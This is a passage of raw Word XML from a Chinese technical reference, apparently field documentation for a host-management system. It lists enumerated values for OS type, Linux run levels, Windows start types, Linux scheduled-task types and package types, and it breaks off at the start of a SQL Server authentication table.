          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CC1ACF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D301CA6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="636AF437" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1927D333" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27DE109D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56B32FF1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09C7B5F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>osType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D9C9E45" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C70993B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>windows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="334323A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="275" w:name="linux默认启动模式"/>
      <w:bookmarkEnd w:id="274"/>
      <w:r>
        <w:t>linux默认启动模式</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5929"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0B7989C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1BB246B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7370EE8A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E7C23E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0DA8068E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="50A6F6EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="305BA9F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4793D6E6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>关机。不能将系统缺省运行级别设置为0，否则无法启动。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6DB7549D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="021036A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="430C6514" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D8E78A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>单用户模式，只允许root用户对系统进行维护。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0D2D6EFA" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D3602D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C180365" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1046F4E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>多用户模式，但不能使用NFS（相当于Windows下的网上邻居）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4490052D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23071D60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62FEBA53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="613EE2CF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字符界面的多用户模式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F19EFA3" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6423715A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EC07A03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7915A9A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未定义。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3F468F2A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="310B322F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1590F31E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74CB88A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>图形界面的多用户模式。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0233C434" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10EF1B19" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>initLevel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FEF4395" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59007921" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>重启。不能将系统缺省运行级别设置为6，否则会一直重启。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="16FAB0DF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="windows启动类型"/>
      <w:bookmarkEnd w:id="275"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>windows启动类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1099"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4563E87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A601469" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42FBCFDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51625BAD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F82BD01" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24DB1227" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0354169F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BF48AEE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>注册表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3FEA259E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5599B976" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="056CC581" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38E18CFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>文件夹</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14B1ED3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="277" w:name="linux任务类型"/>
      <w:bookmarkEnd w:id="276"/>
      <w:r>
        <w:t>linux任务类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1059"/>
        <w:gridCol w:w="1118"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3044D84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8E680D9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE9AFD8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="590BAEFC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E486682" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C29263B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31AC7F80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>CRONTAB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41A411B7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>定时任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05B0968C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A915893" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44FFE6F4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>AT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="284BF988" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>单个任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0A5CFB92" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="628C3EEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>taskType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="395690D8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>BATCH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48FF6F48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>批量任务</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C2BBE6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="278" w:name="linux安装包类型"/>
      <w:bookmarkEnd w:id="277"/>
      <w:r>
        <w:t>linux安装包类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1717"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="1B7FD46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534F96C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C5162F2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594DDF64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1EBF1031" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12032093" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D0555A3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rpm</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70B30476" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>rpm安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="39B47D9C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22DCDBE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DEC036F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dpkg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="324C71BF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dpkg安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="38B67A9E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C439F9D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="294F30FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>java</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E17236A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>java安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4842E426" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B8AC275" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2552F226" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>system</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7A206801" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>system安装类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="49377453" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="windows-sql-server身份验证"/>
      <w:bookmarkEnd w:id="278"/>
      <w:r>
        <w:t>windows SQL Server身份验证</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1291"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="128FD91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F766AEB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF0A040" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
